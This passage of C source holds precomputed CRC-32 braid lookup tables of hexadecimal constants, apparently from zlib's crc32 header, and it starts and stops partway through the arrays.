0xf7235e8c, 0x3e174581, 0x7904b37a, 0x770e75da, 0x301d8321, 0xf929982c, 0xbe3a6ed7, 0xe53c156c, 0xa22fe397, 0x6b1bf89a, 0x2c080e61, 0x2202c8c1, 0x65113e3a, 0xac252537, 0xeb36d3cc}, {0x00000000, 0xa13984ee, 0x99020f9d, 
0x383b8b73, 0xe975197b, 0x484c9d95, 0x707716e6, 0xd14e9208, 0x099b34b7, 0xa8a2b059, 0x90993b2a, 0x31a0bfc4, 0xe0ee2dcc, 0x41d7a922, 0x79ec2251, 0xd8d5a6bf, 0x1336696e, 0xb20fed80, 0x8a3466f3, 0x2b0de21d, 0xfa437015, 0x5b7af4fb, 0x63417f88, 0xc278fb66, 0x1aad5dd9, 0xbb94d937, 0x83af5244, 0x2296d6aa, 0xf3d844a2, 0x52e1c04c, 0x6ada4b3f, 0xcbe3cfd1, 0x266cd2dc, 0x87555632, 0xbf6edd41, 0x1e5759af, 0xcf19cba7, 0x6e204f49, 0x561bc43a, 0xf72240d4, 0x2ff7e66b, 0x8ece6285, 0xb6f5e9f6, 0x17cc6d18, 0xc682ff10, 0x67bb7bfe, 0x5f80f08d, 0xfeb97463, 0x355abbb2, 0x94633f5c, 0xac58b42f, 0x0d6130c1, 0xdc2fa2c9, 0x7d162627, 0x452dad54, 0xe41429ba, 0x3cc18f05, 0x9df80beb, 0xa5c38098, 0x04fa0476, 0xd5b4967e, 0x748d1290, 0x4cb699e3, 0xed8f1d0d, 0x4cd9a5b8, 0xede02156, 0xd5dbaa25, 0x74e22ecb, 0xa5acbcc3, 0x0495382d, 0x3caeb35e, 0x9d9737b0, 0x4542910f, 0xe47b15e1, 0xdc409e92, 0x7d791a7c, 0xac378874, 0x0d0e0c9a, 0x353587e9, 0x940c0307, 0x5fefccd6, 0xfed64838, 0xc6edc34b, 0x67d447a5, 0xb69ad5ad, 0x17a35143, 0x2f98da30, 0x8ea15ede, 0x5674f861, 0xf74d7c8f, 0xcf76f7fc, 0x6e4f7312, 0xbf01e11a, 0x1e3865f4, 0x2603ee87, 0x873a6a69, 0x6ab57764, 0xcb8cf38a, 0xf3b778f9, 0x528efc17, 0x83c06e1f, 0x22f9eaf1, 0x1ac26182, 0xbbfbe56c, 0x632e43d3, 0xc217c73d, 0xfa2c4c4e, 0x5b15c8a0, 0x8a5b5aa8, 0x2b62de46, 0x13595535, 0xb260d1db, 0x79831e0a, 0xd8ba9ae4, 0xe0811197, 0x41b89579, 0x90f60771, 0x31cf839f, 0x09f408ec, 0xa8cd8c02, 0x70182abd, 0xd121ae53, 0xe91a2520, 0x4823a1ce, 0x996d33c6, 0x3854b728, 0x006f3c5b, 0xa156b8b5, 0x99b34b70, 0x388acf9e, 0x00b144ed, 0xa188c003, 0x70c6520b, 0xd1ffd6e5, 0xe9c45d96, 0x48fdd978, 0x90287fc7, 0x3111fb29, 0x092a705a, 0xa813f4b4, 0x795d66bc, 0xd864e252, 0xe05f6921, 0x4166edcf, 0x8a85221e, 0x2bbca6f0, 0x13872d83, 0xb2bea96d, 0x63f03b65, 0xc2c9bf8b, 0xfaf234f8, 0x5bcbb016, 0x831e16a9, 0x22279247, 0x1a1c1934, 0xbb259dda, 0x6a6b0fd2, 0xcb528b3c, 0xf369004f, 0x525084a1, 0xbfdf99ac, 0x1ee61d42, 0x26dd9631, 0x87e412df, 0x56aa80d7, 0xf7930439, 0xcfa88f4a, 0x6e910ba4, 0xb644ad1b, 
0x177d29f5, 0x2f46a286, 0x8e7f2668, 0x5f31b460, 0xfe08308e, 0xc633bbfd, 0x670a3f13, 0xace9f0c2, 0x0dd0742c, 0x35ebff5f, 0x94d27bb1, 0x459ce9b9, 0xe4a56d57, 0xdc9ee624, 0x7da762ca, 0xa572c475, 0x044b409b, 0x3c70cbe8, 0x9d494f06, 0x4c07dd0e, 0xed3e59e0, 0xd505d293, 0x743c567d, 0xd56aeec8, 0x74536a26, 0x4c68e155, 0xed5165bb, 0x3c1ff7b3, 0x9d26735d, 0xa51df82e, 0x04247cc0, 0xdcf1da7f, 0x7dc85e91, 0x45f3d5e2, 0xe4ca510c, 0x3584c304, 0x94bd47ea, 0xac86cc99, 0x0dbf4877, 0xc65c87a6, 0x67650348, 0x5f5e883b, 0xfe670cd5, 0x2f299edd, 0x8e101a33, 0xb62b9140, 0x171215ae, 0xcfc7b311, 0x6efe37ff, 0x56c5bc8c, 0xf7fc3862, 0x26b2aa6a, 0x878b2e84, 0xbfb0a5f7, 0x1e892119, 0xf3063c14, 0x523fb8fa, 0x6a043389, 0xcb3db767, 0x1a73256f, 0xbb4aa181, 0x83712af2, 0x2248ae1c, 0xfa9d08a3, 0x5ba48c4d, 0x639f073e, 0xc2a683d0, 0x13e811d8, 0xb2d19536, 0x8aea1e45, 0x2bd39aab, 0xe030557a, 0x4109d194, 0x79325ae7, 0xd80bde09, 0x09454c01, 0xa87cc8ef, 0x9047439c, 0x317ec772, 0xe9ab61cd, 0x4892e523, 0x70a96e50, 0xd190eabe, 0x00de78b6, 0xa1e7fc58, 0x99dc772b, 0x38e5f3c5}, {0x00000000, 0xe81790a1, 0x0b5e2703, 0xe349b7a2, 0x16bc4e06, 0xfeabdea7, 0x1de26905, 0xf5f5f9a4, 0x2d789c0c, 0xc56f0cad, 0x2626bb0f, 0xce312bae, 0x3bc4d20a, 0xd3d342ab, 0x309af509, 0xd88d65a8, 0x5af13818, 0xb2e6a8b9, 0x51af1f1b, 0xb9b88fba, 0x4c4d761e, 0xa45ae6bf, 0x4713511d, 0xaf04c1bc, 0x7789a414, 0x9f9e34b5, 0x7cd78317, 0x94c013b6, 0x6135ea12, 0x89227ab3, 0x6a6bcd11, 0x827c5db0, 0xb5e27030, 0x5df5e091, 0xbebc5733, 0x56abc792, 0xa35e3e36, 0x4b49ae97, 0xa8001935, 0x40178994, 0x989aec3c, 0x708d7c9d, 0x93c4cb3f, 0x7bd35b9e, 0x8e26a23a, 0x6631329b, 0x85788539, 0x6d6f1598, 0xef134828, 0x0704d889, 0xe44d6f2b, 0x0c5aff8a, 0xf9af062e, 0x11b8968f, 0xf2f1212d, 0x1ae6b18c, 0xc26bd424, 0x2a7c4485, 0xc935f327, 0x21226386, 0xd4d79a22, 0x3cc00a83, 0xdf89bd21, 0x379e2d80, 0xb0b5e621, 0x58a27680, 0xbbebc122, 0x53fc5183, 0xa609a827, 0x4e1e3886, 0xad578f24, 0x45401f85, 0x9dcd7a2d, 0x75daea8c, 0x96935d2e, 0x7e84cd8f, 0x8b71342b, 0x6366a48a, 0x802f1328, 
0x68388389, 0xea44de39, 0x02534e98, 0xe11af93a, 0x090d699b, 0xfcf8903f, 0x14ef009e, 0xf7a6b73c, 0x1fb1279d, 0xc73c4235, 0x2f2bd294, 0xcc626536, 0x2475f597, 0xd1800c33, 0x39979c92, 0xdade2b30, 0x32c9bb91, 0x05579611, 0xed4006b0, 0x0e09b112, 0xe61e21b3, 0x13ebd817, 0xfbfc48b6, 0x18b5ff14, 0xf0a26fb5, 0x282f0a1d, 0xc0389abc, 0x23712d1e, 0xcb66bdbf, 0x3e93441b, 0xd684d4ba, 0x35cd6318, 0xdddaf3b9, 0x5fa6ae09, 0xb7b13ea8, 0x54f8890a, 0xbcef19ab, 0x491ae00f, 0xa10d70ae, 0x4244c70c, 0xaa5357ad, 0x72de3205, 0x9ac9a2a4, 0x79801506, 0x919785a7, 0x64627c03, 0x8c75eca2, 0x6f3c5b00, 0x872bcba1, 0xba1aca03, 0x520d5aa2, 0xb144ed00, 0x59537da1, 0xaca68405, 0x44b114a4, 0xa7f8a306, 0x4fef33a7, 0x9762560f, 0x7f75c6ae, 0x9c3c710c, 0x742be1ad, 0x81de1809, 0x69c988a8, 0x8a803f0a, 0x6297afab, 0xe0ebf21b, 0x08fc62ba, 0xebb5d518, 0x03a245b9, 0xf657bc1d, 0x1e402cbc, 0xfd099b1e, 0x151e0bbf, 0xcd936e17, 0x2584feb6, 0xc6cd4914, 0x2edad9b5, 0xdb2f2011, 0x3338b0b0, 0xd0710712, 0x386697b3, 0x0ff8ba33, 0xe7ef2a92, 0x04a69d30, 0xecb10d91, 0x1944f435, 0xf1536494, 0x121ad336, 0xfa0d4397, 0x2280263f, 0xca97b69e, 0x29de013c, 0xc1c9919d, 0x343c6839, 0xdc2bf898, 0x3f624f3a, 0xd775df9b, 0x5509822b, 0xbd1e128a, 0x5e57a528, 0xb6403589, 0x43b5cc2d, 0xaba25c8c, 0x48ebeb2e, 0xa0fc7b8f, 0x78711e27, 0x90668e86, 0x732f3924, 0x9b38a985, 0x6ecd5021, 0x86dac080, 0x65937722, 0x8d84e783, 0x0aaf2c22, 0xe2b8bc83, 0x01f10b21, 0xe9e69b80, 0x1c136224, 0xf404f285, 0x174d4527, 0xff5ad586, 0x27d7b02e, 0xcfc0208f, 0x2c89972d, 0xc49e078c, 0x316bfe28, 0xd97c6e89, 0x3a35d92b, 0xd222498a, 0x505e143a, 0xb849849b, 0x5b003339, 0xb317a398, 0x46e25a3c, 0xaef5ca9d, 0x4dbc7d3f, 0xa5abed9e, 0x7d268836, 0x95311897, 0x7678af35, 0x9e6f3f94, 0x6b9ac630, 0x838d5691, 0x60c4e133, 0x88d37192, 0xbf4d5c12, 0x575accb3, 0xb4137b11, 0x5c04ebb0, 0xa9f11214, 0x41e682b5, 0xa2af3517, 0x4ab8a5b6, 0x9235c01e, 0x7a2250bf, 0x996be71d, 0x717c77bc, 0x84898e18, 0x6c9e1eb9, 0x8fd7a91b, 0x67c039ba, 0xe5bc640a, 0x0dabf4ab, 0xeee24309, 0x06f5d3a8, 0xf3002a0c, 
0x1b17baad, 0xf85e0d0f, 0x10499dae, 0xc8c4f806, 0x20d368a7, 0xc39adf05, 0x2b8d4fa4, 0xde78b600, 0x366f26a1, 0xd5269103, 0x3d3101a2}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0xa19017e800000000, 0x03275e0b00000000, 0xa2b749e300000000, 0x064ebc1600000000, 0xa7deabfe00000000, 0x0569e21d00000000, 0xa4f9f5f500000000, 0x0c9c782d00000000, 0xad0c6fc500000000, 0x0fbb262600000000, 0xae2b31ce00000000, 0x0ad2c43b00000000, 0xab42d3d300000000, 0x09f59a3000000000, 0xa8658dd800000000, 0x1838f15a00000000, 0xb9a8e6b200000000, 0x1b1faf5100000000, 0xba8fb8b900000000, 0x1e764d4c00000000, 0xbfe65aa400000000, 0x1d51134700000000, 0xbcc104af00000000, 0x14a4897700000000, 0xb5349e9f00000000, 0x1783d77c00000000, 0xb613c09400000000, 0x12ea356100000000, 0xb37a228900000000, 0x11cd6b6a00000000, 0xb05d7c8200000000, 0x3070e2b500000000, 0x91e0f55d00000000, 0x3357bcbe00000000, 0x92c7ab5600000000, 0x363e5ea300000000, 0x97ae494b00000000, 0x351900a800000000, 0x9489174000000000, 0x3cec9a9800000000, 0x9d7c8d7000000000, 0x3fcbc49300000000, 0x9e5bd37b00000000, 0x3aa2268e00000000, 0x9b32316600000000, 0x3985788500000000, 0x98156f6d00000000, 0x284813ef00000000, 0x89d8040700000000, 0x2b6f4de400000000, 0x8aff5a0c00000000, 0x2e06aff900000000, 0x8f96b81100000000, 0x2d21f1f200000000, 0x8cb1e61a00000000, 0x24d46bc200000000, 0x85447c2a00000000, 0x27f335c900000000, 0x8663222100000000, 0x229ad7d400000000, 0x830ac03c00000000, 0x21bd89df00000000, 0x802d9e3700000000, 0x21e6b5b000000000, 0x8076a25800000000, 0x22c1ebbb00000000, 0x8351fc5300000000, 0x27a809a600000000, 0x86381e4e00000000, 0x248f57ad00000000, 0x851f404500000000, 0x2d7acd9d00000000, 0x8ceada7500000000, 0x2e5d939600000000, 0x8fcd847e00000000, 0x2b34718b00000000, 0x8aa4666300000000, 0x28132f8000000000, 0x8983386800000000, 0x39de44ea00000000, 0x984e530200000000, 0x3af91ae100000000, 0x9b690d0900000000, 0x3f90f8fc00000000, 0x9e00ef1400000000, 0x3cb7a6f700000000, 0x9d27b11f00000000, 0x35423cc700000000, 0x94d22b2f00000000, 
0x366562cc00000000, 0x97f5752400000000, 0x330c80d100000000, 0x929c973900000000, 0x302bdeda00000000, 0x91bbc93200000000, 0x1196570500000000, 0xb00640ed00000000, 0x12b1090e00000000, 0xb3211ee600000000, 0x17d8eb1300000000, 0xb648fcfb00000000, 0x14ffb51800000000, 0xb56fa2f000000000, 0x1d0a2f2800000000, 0xbc9a38c000000000, 0x1e2d712300000000, 0xbfbd66cb00000000, 0x1b44933e00000000, 0xbad484d600000000, 0x1863cd3500000000, 0xb9f3dadd00000000, 0x09aea65f00000000, 0xa83eb1b700000000, 0x0a89f85400000000, 0xab19efbc00000000, 0x0fe01a4900000000, 0xae700da100000000, 0x0cc7444200000000, 0xad5753aa00000000, 0x0532de7200000000, 0xa4a2c99a00000000, 0x0615807900000000, 0xa785979100000000, 0x037c626400000000, 0xa2ec758c00000000, 0x005b3c6f00000000, 0xa1cb2b8700000000, 0x03ca1aba00000000, 0xa25a0d5200000000, 0x00ed44b100000000, 0xa17d535900000000, 0x0584a6ac00000000, 0xa414b14400000000, 0x06a3f8a700000000, 0xa733ef4f00000000, 0x0f56629700000000, 0xaec6757f00000000, 0x0c713c9c00000000, 0xade12b7400000000, 0x0918de8100000000, 0xa888c96900000000, 0x0a3f808a00000000, 0xabaf976200000000, 0x1bf2ebe000000000, 0xba62fc0800000000, 0x18d5b5eb00000000, 0xb945a20300000000, 0x1dbc57f600000000, 0xbc2c401e00000000, 0x1e9b09fd00000000, 0xbf0b1e1500000000, 0x176e93cd00000000, 0xb6fe842500000000, 0x1449cdc600000000, 0xb5d9da2e00000000, 0x11202fdb00000000, 0xb0b0383300000000, 0x120771d000000000, 0xb397663800000000, 0x33baf80f00000000, 0x922aefe700000000, 0x309da60400000000, 0x910db1ec00000000, 0x35f4441900000000, 0x946453f100000000, 0x36d31a1200000000, 0x97430dfa00000000, 0x3f26802200000000, 0x9eb697ca00000000, 0x3c01de2900000000, 0x9d91c9c100000000, 0x39683c3400000000, 0x98f82bdc00000000, 0x3a4f623f00000000, 0x9bdf75d700000000, 0x2b82095500000000, 0x8a121ebd00000000, 0x28a5575e00000000, 0x893540b600000000, 0x2dccb54300000000, 0x8c5ca2ab00000000, 0x2eebeb4800000000, 0x8f7bfca000000000, 0x271e717800000000, 0x868e669000000000, 0x24392f7300000000, 0x85a9389b00000000, 0x2150cd6e00000000, 0x80c0da8600000000, 
0x2277936500000000, 0x83e7848d00000000, 0x222caf0a00000000, 0x83bcb8e200000000, 0x210bf10100000000, 0x809be6e900000000, 0x2462131c00000000, 0x85f204f400000000, 0x27454d1700000000, 0x86d55aff00000000, 0x2eb0d72700000000, 0x8f20c0cf00000000, 0x2d97892c00000000, 0x8c079ec400000000, 0x28fe6b3100000000, 0x896e7cd900000000, 0x2bd9353a00000000, 0x8a4922d200000000, 0x3a145e5000000000, 0x9b8449b800000000, 0x3933005b00000000, 0x98a317b300000000, 0x3c5ae24600000000, 0x9dcaf5ae00000000, 0x3f7dbc4d00000000, 0x9eedaba500000000, 0x3688267d00000000, 0x9718319500000000, 0x35af787600000000, 0x943f6f9e00000000, 0x30c69a6b00000000, 0x91568d8300000000, 0x33e1c46000000000, 0x9271d38800000000, 0x125c4dbf00000000, 0xb3cc5a5700000000, 0x117b13b400000000, 0xb0eb045c00000000, 0x1412f1a900000000, 0xb582e64100000000, 0x1735afa200000000, 0xb6a5b84a00000000, 0x1ec0359200000000, 0xbf50227a00000000, 0x1de76b9900000000, 0xbc777c7100000000, 0x188e898400000000, 0xb91e9e6c00000000, 0x1ba9d78f00000000, 0xba39c06700000000, 0x0a64bce500000000, 0xabf4ab0d00000000, 0x0943e2ee00000000, 0xa8d3f50600000000, 0x0c2a00f300000000, 0xadba171b00000000, 0x0f0d5ef800000000, 0xae9d491000000000, 0x06f8c4c800000000, 0xa768d32000000000, 0x05df9ac300000000, 0xa44f8d2b00000000, 0x00b678de00000000, 0xa1266f3600000000, 0x039126d500000000, 0xa201313d00000000}, {0x0000000000000000, 0xee8439a100000000, 0x9d0f029900000000, 0x738b3b3800000000, 0x7b1975e900000000, 0x959d4c4800000000, 0xe616777000000000, 0x08924ed100000000, 0xb7349b0900000000, 0x59b0a2a800000000, 0x2a3b999000000000, 0xc4bfa03100000000, 0xcc2deee000000000, 0x22a9d74100000000, 0x5122ec7900000000, 0xbfa6d5d800000000, 0x6e69361300000000, 0x80ed0fb200000000, 0xf366348a00000000, 0x1de20d2b00000000, 0x157043fa00000000, 0xfbf47a5b00000000, 0x887f416300000000, 0x66fb78c200000000, 0xd95dad1a00000000, 0x37d994bb00000000, 0x4452af8300000000, 0xaad6962200000000, 0xa244d8f300000000, 0x4cc0e15200000000, 0x3f4bda6a00000000, 0xd1cfe3cb00000000, 0xdcd26c2600000000, 
0x3256558700000000, 0x41dd6ebf00000000, 0xaf59571e00000000, 0xa7cb19cf00000000, 0x494f206e00000000, 0x3ac41b5600000000, 0xd44022f700000000, 0x6be6f72f00000000, 0x8562ce8e00000000, 0xf6e9f5b600000000, 0x186dcc1700000000, 0x10ff82c600000000, 0xfe7bbb6700000000, 0x8df0805f00000000, 0x6374b9fe00000000, 0xb2bb5a3500000000, 0x5c3f639400000000, 0x2fb458ac00000000, 0xc130610d00000000, 0xc9a22fdc00000000, 0x2726167d00000000, 0x54ad2d4500000000, 0xba2914e400000000, 0x058fc13c00000000, 0xeb0bf89d00000000, 0x9880c3a500000000, 0x7604fa0400000000, 0x7e96b4d500000000, 0x90128d7400000000, 0xe399b64c00000000, 0x0d1d8fed00000000, 0xb8a5d94c00000000, 0x5621e0ed00000000, 0x25aadbd500000000, 0xcb2ee27400000000, 0xc3bcaca500000000, 0x2d38950400000000, 0x5eb3ae3c00000000, 0xb037979d00000000, 0x0f91424500000000, 0xe1157be400000000, 0x929e40dc00000000, 0x7c1a797d00000000, 0x748837ac00000000, 0x9a0c0e0d00000000, 0xe987353500000000, 0x07030c9400000000, 0xd6ccef5f00000000, 0x3848d6fe00000000, 0x4bc3edc600000000, 0xa547d46700000000, 0xadd59ab600000000, 0x4351a31700000000, 0x30da982f00000000, 0xde5ea18e00000000, 0x61f8745600000000, 0x8f7c4df700000000, 0xfcf776cf00000000, 0x12734f6e00000000, 0x1ae101bf00000000, 0xf465381e00000000, 0x87ee032600000000, 0x696a3a8700000000, 0x6477b56a00000000, 0x8af38ccb00000000, 0xf978b7f300000000, 0x17fc8e5200000000, 0x1f6ec08300000000, 0xf1eaf92200000000, 0x8261c21a00000000, 0x6ce5fbbb00000000, 0xd3432e6300000000, 0x3dc717c200000000, 0x4e4c2cfa00000000, 0xa0c8155b00000000, 0xa85a5b8a00000000, 0x46de622b00000000, 0x3555591300000000, 0xdbd160b200000000, 0x0a1e837900000000, 0xe49abad800000000, 0x971181e000000000, 0x7995b84100000000, 0x7107f69000000000, 0x9f83cf3100000000, 0xec08f40900000000, 0x028ccda800000000, 0xbd2a187000000000, 0x53ae21d100000000, 0x20251ae900000000, 0xcea1234800000000, 0xc6336d9900000000, 0x28b7543800000000, 0x5b3c6f0000000000, 0xb5b856a100000000, 0x704bb39900000000, 0x9ecf8a3800000000, 0xed44b10000000000, 0x03c088a100000000, 0x0b52c67000000000, 
0xe5d6ffd100000000, 0x965dc4e900000000, 0x78d9fd4800000000, 0xc77f289000000000, 0x29fb113100000000, 0x5a702a0900000000, 0xb4f413a800000000, 0xbc665d7900000000, 0x52e264d800000000, 0x21695fe000000000, 0xcfed664100000000, 0x1e22858a00000000, 0xf0a6bc2b00000000, 0x832d871300000000, 0x6da9beb200000000, 0x653bf06300000000, 0x8bbfc9c200000000, 0xf834f2fa00000000, 0x16b0cb5b00000000, 0xa9161e8300000000, 0x4792272200000000, 0x34191c1a00000000, 0xda9d25bb00000000, 0xd20f6b6a00000000, 0x3c8b52cb00000000, 0x4f0069f300000000, 0xa184505200000000, 0xac99dfbf00000000, 0x421de61e00000000, 0x3196dd2600000000, 0xdf12e48700000000, 0xd780aa5600000000, 0x390493f700000000, 0x4a8fa8cf00000000, 0xa40b916e00000000, 0x1bad44b600000000, 0xf5297d1700000000, 0x86a2462f00000000, 0x68267f8e00000000, 0x60b4315f00000000, 0x8e3008fe00000000, 0xfdbb33c600000000, 0x133f0a6700000000, 0xc2f0e9ac00000000, 0x2c74d00d00000000, 0x5fffeb3500000000, 0xb17bd29400000000, 0xb9e99c4500000000, 0x576da5e400000000, 0x24e69edc00000000, 0xca62a77d00000000, 0x75c472a500000000, 0x9b404b0400000000, 0xe8cb703c00000000, 0x064f499d00000000, 0x0edd074c00000000, 0xe0593eed00000000, 0x93d205d500000000, 0x7d563c7400000000, 0xc8ee6ad500000000, 0x266a537400000000, 0x55e1684c00000000, 0xbb6551ed00000000, 0xb3f71f3c00000000, 0x5d73269d00000000, 0x2ef81da500000000, 0xc07c240400000000, 0x7fdaf1dc00000000, 0x915ec87d00000000, 0xe2d5f34500000000, 0x0c51cae400000000, 0x04c3843500000000, 0xea47bd9400000000, 0x99cc86ac00000000, 0x7748bf0d00000000, 0xa6875cc600000000, 0x4803656700000000, 0x3b885e5f00000000, 0xd50c67fe00000000, 0xdd9e292f00000000, 0x331a108e00000000, 0x40912bb600000000, 0xae15121700000000, 0x11b3c7cf00000000, 0xff37fe6e00000000, 0x8cbcc55600000000, 0x6238fcf700000000, 0x6aaab22600000000, 0x842e8b8700000000, 0xf7a5b0bf00000000, 0x1921891e00000000, 0x143c06f300000000, 0xfab83f5200000000, 0x8933046a00000000, 0x67b73dcb00000000, 0x6f25731a00000000, 0x81a14abb00000000, 0xf22a718300000000, 0x1cae482200000000, 0xa3089dfa00000000, 
0x4d8ca45b00000000, 0x3e079f6300000000, 0xd083a6c200000000, 0xd811e81300000000, 0x3695d1b200000000, 0x451eea8a00000000, 0xab9ad32b00000000, 0x7a5530e000000000, 0x94d1094100000000, 0xe75a327900000000, 0x09de0bd800000000, 0x014c450900000000, 0xefc87ca800000000, 0x9c43479000000000, 0x72c77e3100000000, 0xcd61abe900000000, 0x23e5924800000000, 0x506ea97000000000, 0xbeea90d100000000, 0xb678de0000000000, 0x58fce7a100000000, 0x2b77dc9900000000, 0xc5f3e53800000000}, {0x0000000000000000, 0xfbf6134700000000, 0xf6ed278e00000000, 0x0d1b34c900000000, 0xaddd3ec700000000, 0x562b2d8000000000, 0x5b30194900000000, 0xa0c60a0e00000000, 0x1bbd0c5500000000, 0xe04b1f1200000000, 0xed502bdb00000000, 0x16a6389c00000000, 0xb660329200000000, 0x4d9621d500000000, 0x408d151c00000000, 0xbb7b065b00000000, 0x367a19aa00000000, 0xcd8c0aed00000000, 0xc0973e2400000000, 0x3b612d6300000000, 0x9ba7276d00000000, 0x6051342a00000000, 0x6d4a00e300000000, 0x96bc13a400000000, 0x2dc715ff00000000, 0xd63106b800000000, 0xdb2a327100000000, 0x20dc213600000000, 0x801a2b3800000000, 0x7bec387f00000000, 0x76f70cb600000000, 0x8d011ff100000000, 0x2df2438f00000000, 0xd60450c800000000, 0xdb1f640100000000, 0x20e9774600000000, 0x802f7d4800000000, 0x7bd96e0f00000000, 0x76c25ac600000000, 0x8d34498100000000, 0x364f4fda00000000, 0xcdb95c9d00000000, 0xc0a2685400000000, 0x3b547b1300000000, 0x9b92711d00000000, 0x6064625a00000000, 0x6d7f569300000000, 0x968945d400000000, 0x1b885a2500000000, 0xe07e496200000000, 0xed657dab00000000, 0x16936eec00000000, 0xb65564e200000000, 0x4da377a500000000, 0x40b8436c00000000, 0xbb4e502b00000000, 0x0035567000000000, 0xfbc3453700000000, 0xf6d871fe00000000, 0x0d2e62b900000000, 0xade868b700000000, 0x561e7bf000000000, 0x5b054f3900000000, 0xa0f35c7e00000000, 0x1be2f6c500000000, 0xe014e58200000000, 0xed0fd14b00000000, 0x16f9c20c00000000, 0xb63fc80200000000, 0x4dc9db4500000000, 0x40d2ef8c00000000, 0xbb24fccb00000000, 0x005ffa9000000000, 0xfba9e9d700000000, 0xf6b2dd1e00000000, 0x0d44ce5900000000, 
0xad82c45700000000, 0x5674d71000000000, 0x5b6fe3d900000000, 0xa099f09e00000000, 0x2d98ef6f00000000, 0xd66efc2800000000, 0xdb75c8e100000000, 0x2083dba600000000, 0x8045d1a800000000, 0x7bb3c2ef00000000, 0x76a8f62600000000, 0x8d5ee56100000000, 0x3625e33a00000000, 0xcdd3f07d00000000, 0xc0c8c4b400000000, 0x3b3ed7f300000000, 0x9bf8ddfd00000000, 0x600eceba00000000, 0x6d15fa7300000000, 0x96e3e93400000000, 0x3610b54a00000000, 0xcde6a60d00000000, 0xc0fd92c400000000, 0x3b0b818300000000, 0x9bcd8b8d00000000, 0x603b98ca00000000, 0x6d20ac0300000000, 0x96d6bf4400000000, 0x2dadb91f00000000, 0xd65baa5800000000, 0xdb409e9100000000, 0x20b68dd600000000, 0x807087d800000000, 0x7b86949f00000000, 0x769da05600000000, 0x8d6bb31100000000, 0x006aace000000000, 0xfb9cbfa700000000, 0xf6878b6e00000000, 0x0d71982900000000, 0xadb7922700000000, 0x5641816000000000, 0x5b5ab5a900000000, 0xa0aca6ee00000000, 0x1bd7a0b500000000, 0xe021b3f200000000, 0xed3a873b00000000, 0x16cc947c00000000, 0xb60a9e7200000000, 0x4dfc8d3500000000, 0x40e7b9fc00000000, 0xbb11aabb00000000, 0x77c29c5000000000, 0x8c348f1700000000, 0x812fbbde00000000, 0x7ad9a89900000000, 0xda1fa29700000000, 0x21e9b1d000000000, 0x2cf2851900000000, 0xd704965e00000000, 0x6c7f900500000000, 0x9789834200000000, 0x9a92b78b00000000, 0x6164a4cc00000000, 0xc1a2aec200000000, 0x3a54bd8500000000, 0x374f894c00000000, 0xccb99a0b00000000, 0x41b885fa00000000, 0xba4e96bd00000000, 0xb755a27400000000, 0x4ca3b13300000000, 0xec65bb3d00000000, 0x1793a87a00000000, 0x1a889cb300000000, 0xe17e8ff400000000, 0x5a0589af00000000, 0xa1f39ae800000000, 0xace8ae2100000000, 0x571ebd6600000000, 0xf7d8b76800000000, 0x0c2ea42f00000000, 0x013590e600000000, 0xfac383a100000000, 0x5a30dfdf00000000, 0xa1c6cc9800000000, 0xacddf85100000000, 0x572beb1600000000, 0xf7ede11800000000, 0x0c1bf25f00000000, 0x0100c69600000000, 0xfaf6d5d100000000, 0x418dd38a00000000, 0xba7bc0cd00000000, 0xb760f40400000000, 0x4c96e74300000000, 0xec50ed4d00000000, 0x17a6fe0a00000000, 0x1abdcac300000000, 0xe14bd98400000000, 
0x6c4ac67500000000, 0x97bcd53200000000, 0x9aa7e1fb00000000, 0x6151f2bc00000000, 0xc197f8b200000000, 0x3a61ebf500000000, 0x377adf3c00000000, 0xcc8ccc7b00000000, 0x77f7ca2000000000, 0x8c01d96700000000, 0x811aedae00000000, 0x7aecfee900000000, 0xda2af4e700000000, 0x21dce7a000000000, 0x2cc7d36900000000, 0xd731c02e00000000, 0x6c206a9500000000, 0x97d679d200000000, 0x9acd4d1b00000000, 0x613b5e5c00000000, 0xc1fd545200000000, 0x3a0b471500000000, 0x371073dc00000000, 0xcce6609b00000000, 0x779d66c000000000, 0x8c6b758700000000, 0x8170414e00000000, 0x7a86520900000000, 0xda40580700000000, 0x21b64b4000000000, 0x2cad7f8900000000, 0xd75b6cce00000000, 0x5a5a733f00000000, 0xa1ac607800000000, 0xacb754b100000000, 0x574147f600000000, 0xf7874df800000000, 0x0c715ebf00000000, 0x016a6a7600000000, 0xfa9c793100000000, 0x41e77f6a00000000, 0xba116c2d00000000, 0xb70a58e400000000, 0x4cfc4ba300000000, 0xec3a41ad00000000, 0x17cc52ea00000000, 0x1ad7662300000000, 0xe121756400000000, 0x41d2291a00000000, 0xba243a5d00000000, 0xb73f0e9400000000, 0x4cc91dd300000000, 0xec0f17dd00000000, 0x17f9049a00000000, 0x1ae2305300000000, 0xe114231400000000, 0x5a6f254f00000000, 0xa199360800000000, 0xac8202c100000000, 0x5774118600000000, 0xf7b21b8800000000, 0x0c4408cf00000000, 0x015f3c0600000000, 0xfaa92f4100000000, 0x77a830b000000000, 0x8c5e23f700000000, 0x8145173e00000000, 0x7ab3047900000000, 0xda750e7700000000, 0x21831d3000000000, 0x2c9829f900000000, 0xd76e3abe00000000, 0x6c153ce500000000, 0x97e32fa200000000, 0x9af81b6b00000000, 0x610e082c00000000, 0xc1c8022200000000, 0x3a3e116500000000, 0x372525ac00000000, 0xccd336eb00000000}, {0x0000000000000000, 0x6238282a00000000, 0xc470505400000000, 0xa648787e00000000, 0x88e1a0a800000000, 0xead9888200000000, 0x4c91f0fc00000000, 0x2ea9d8d600000000, 0x51c5308a00000000, 0x33fd18a000000000, 0x95b560de00000000, 0xf78d48f400000000, 0xd924902200000000, 0xbb1cb80800000000, 0x1d54c07600000000, 0x7f6ce85c00000000, 0xe38c10cf00000000, 0x81b438e500000000, 0x27fc409b00000000, 
0x45c468b100000000, 0x6b6db06700000000, 0x0955984d00000000, 0xaf1de03300000000, 0xcd25c81900000000, 0xb249204500000000, 0xd071086f00000000, 0x7639701100000000, 0x1401583b00000000, 0x3aa880ed00000000, 0x5890a8c700000000, 0xfed8d0b900000000, 0x9ce0f89300000000, 0x871f504500000000, 0xe527786f00000000, 0x436f001100000000, 0x2157283b00000000, 0x0ffef0ed00000000, 0x6dc6d8c700000000, 0xcb8ea0b900000000, 0xa9b6889300000000, 0xd6da60cf00000000, 0xb4e248e500000000, 0x12aa309b00000000, 0x709218b100000000, 0x5e3bc06700000000, 0x3c03e84d00000000, 0x9a4b903300000000, 0xf873b81900000000, 0x6493408a00000000, 0x06ab68a000000000, 0xa0e310de00000000, 0xc2db38f400000000, 0xec72e02200000000, 0x8e4ac80800000000, 0x2802b07600000000, 0x4a3a985c00000000, 